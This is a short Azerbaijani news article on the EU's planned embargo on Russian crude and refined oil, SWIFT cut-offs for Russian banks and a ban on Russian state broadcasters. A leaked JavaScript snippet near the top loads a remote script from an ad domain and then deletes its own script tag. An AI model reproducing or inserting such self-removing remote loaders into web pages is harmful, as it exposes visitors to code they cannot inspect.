Aİ bütün Rusiya neftinə embarqo qoymağı planlaşdırır

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

“Avropa İttifaqı Rusiyanın həm xam, həm də emal olunmuş neftinin idxalına qadağa qoymağı planlaşdırır”.

Bu barədə Avropa Komissiyasının rəhbəri Ursula fon der Leyen Brüsseldə Aİ-nin altıncı sanksiyalar paketi ilə bağlı keçirilən toplantısını şərh edərkən bildirib.

Onun sözlərinə görə, Aİ altı ay ərzində Rusiyadan xam neftin tədarükünü, 2022-ci ilin sonuna isə emal olunmuş məhsulların idxalını dayandırmaq niyyətindədir.

Avropa Komissiyasının rəhbəri bildirib ki, sanksiyalar həmçinin Rusiyanın yüksək rütbəli hərbçilərinə və müharibə cinayəti törətmiş digər şəxslərə qarşı məhdudiyyətləri, “Sberbank” da daxil olmaqla bir sıra digər iri Rusiya banklarının beynəlxalq SWIFT sistemindən ayrılmasını və Rusiyanın üç əsas dövlət kanalının Avropa İttifaqında yayımına qadağanı nəzərdə tutur.

Mənbə: Reuters

Oxu.az

Bu yazılara da göz atın...